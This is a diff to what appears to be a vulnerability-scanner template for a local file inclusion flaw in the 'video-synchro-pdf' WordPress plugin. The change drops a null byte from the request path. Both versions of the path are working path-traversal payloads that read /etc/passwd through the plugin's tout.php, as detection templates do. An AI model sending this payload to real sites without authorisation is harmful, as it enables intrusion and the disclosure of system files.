--- a/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
+++ b/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
@@ -12,7 +12,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'
+      - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd'
 
     matchers-condition: and
     matchers:
